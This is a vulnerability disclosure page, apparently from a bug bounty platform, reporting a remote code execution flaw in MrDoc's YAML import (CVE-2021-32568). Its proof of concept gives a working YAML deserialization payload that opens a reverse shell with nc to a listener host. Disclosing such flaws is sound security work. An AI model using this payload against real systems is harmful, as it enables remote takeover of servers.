Lucene search
B1nslashsh04FC04B3-2DC1-4CAD-A090-E403CD66B5ADHistoryAug 29, 2021 - 9:12 a.m.
in zmister2016/mrdoc
2021-08-2909:12:09
b1nslashsh
www.huntr.dev
11
python
document management
rce vulnerability
EPSS
0.001
Percentile
35.0%
✍️ Description
online document system developed based on python. It is suitable for individuals and small teams to manage documents, wiki, knowledge and notes. like gitbook this package is vulnerable for RCE due to Yaml.load in import function
🕵️♂️ Proof of Concept
Uploaded ZIp :
Payload.yaml :
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.102 8090 >/tmp/f')"
💥 Impact
This vulnerability is capable of RCE
Related
cve
cve
CVE-2021-32568
2021-09-06 12:15:07
cnvd
cnvd
mrdoc code issue vulnerability
2021-09-08 00:00:00
prion
prion
Deserialization of untrusted data
2021-09-06 12:15:00
cvelist
cvelist
CVE-2021-32568 Deserialization of Untrusted Data in zmister2016/mrdoc
2021-09-06 11:17:15
nvd
nvd
CVE-2021-32568
2021-09-06 12:15:07
osv
osv
CVE-2021-32568
2021-09-06 12:15:07